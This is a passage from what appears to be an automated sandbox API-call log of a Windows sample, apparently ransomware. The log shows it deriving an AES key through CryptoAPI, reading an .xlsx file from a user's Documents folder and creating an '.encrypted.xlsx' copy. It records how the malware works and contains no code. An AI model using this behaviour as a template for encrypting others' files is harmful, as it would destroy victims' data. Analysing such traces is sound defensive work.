HALPmcxz\\Documents\\60y_PcRGjqYHqff.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\60y_PcRGjqYHqff.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\60y_PcRGjqYHqff.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\60y_PcRGjqYHqff.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\60y_PcRGjqYHqff.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\60y_PcRGjqYHqff.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\60y_PcRGjqYHqff.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\60y_PcRGjqYHqff.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\60y_PcRGjqYHqff.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\60y_PcRGjqYHqff.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\60y_PcRGjqYHqff.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\60y_PcRGjqYHqff.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\60y_PcRGjqYHqff.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\60y_PcRGjqYHqff.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\60y_PcRGjqYHqff.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\60y_PcRGjqYHqff.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\60y_PcRGjqYHqff.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\60y_PcRGjqYHqff.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\60y_PcRGjqYHqff.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\60y_PcRGjqYHqff.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\60y_PcRGjqYHqff.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\60y_PcRGjqYHqff.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\60y_PcRGjqYHqff.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\60y_PcRGjqYHqff.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="60y_PcRGjqYHqff.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0y_PcRGjqYHqff.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y_PcRGjqYHqff.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_PcRGjqYHqff.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PcRGjqYHqff.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cRGjqYHqff.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RGjqYHqff.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GjqYHqff.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jqYHqff.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qYHqff.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YHqff.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Hqff.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qff.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.734] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.734] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0032.734] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0032.734] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0032.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0032.734] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0032.734] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0032.734] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0032.734] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0032.734] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\60y_PcRGjqYHqff.xlsx", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3316690, ftCreationTime.dwHighDateTime=0x1d5a10d, ftLastAccessTime.dwLowDateTime=0x20ab7280, ftLastAccessTime.dwHighDateTime=0x1d552db, ftLastWriteTime.dwLowDateTime=0x20ab7280, ftLastWriteTime.dwHighDateTime=0x1d552db, nFileSizeHigh=0x0, nFileSizeLow=0xcef6, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="60y_PcRGjqYHqff.xlsx", cAlternateFileName="60Y_PC~1.XLS")) returned 0x7c2100 [0032.734] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0032.735] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0032.735] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.735] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0032.735] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0032.735] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.735] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.735] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5bb8) returned 1 [0032.736] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0032.736] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0032.736] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0032.736] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0032.737] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.737] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0032.737] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.737] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0032.737] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.737] CryptCreateHash (in: hProv=0x7d5bb8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0032.737] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0032.737] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.737] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.737] CryptHashData (hHash=0x7c2240, pbData=0x7c75d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0032.737] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.737] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0032.737] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.737] CryptDeriveKey (in: hProv=0x7d5bb8, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c21c0) returned 1 [0032.737] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.737] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.737] CryptDestroyHash (hHash=0x7c2240) returned 1 [0032.737] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\60y_PcRGjqYHqff.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\60y_pcrgjqyhqff.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0032.738] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0032.738] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0032.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0032.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0032.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0032.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0032.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0032.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0032.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0032.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0032.738] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0032.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0032.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0032.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0032.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0032.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0032.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0032.738] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0032.738] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0032.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0032.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0032.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0032.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0032.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0032.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0032.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0032.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0032.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0032.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0032.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0032.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0032.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0032.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0032.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0032.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0032.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0032.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0032.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0032.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0032.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0032.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0032.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0032.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0032.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0032.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0032.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0032.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c38b0 [0032.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0032.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0032.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0032.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0032.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c38b0 | out: hHeap=0x770000) returned 1 [0032.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0032.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0032.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0032.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0032.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0032.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0032.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0032.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0032.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0032.740] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0032.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0032.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0032.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0032.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0032.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0032.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0032.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0032.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0032.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0032.740] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\60y_PcRGjqYHqff.encrypted.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\60y_pcrgjqyhqff.encrypted.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0032.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0032.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0032.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0032.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0032.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0032.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0032.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0032.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0032.741] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0032.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0032.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0032.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0032.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0032.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0032.741] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0032.741] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0032.741] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0032.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0032.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0032.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0032.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0032.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0032.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0032.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0032.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0032.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0032.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0032.742] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0032.742] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0032.742] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0032.742] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0xcef6, lpOverlapped=0x0) returned 1 [0032.744] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0032.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 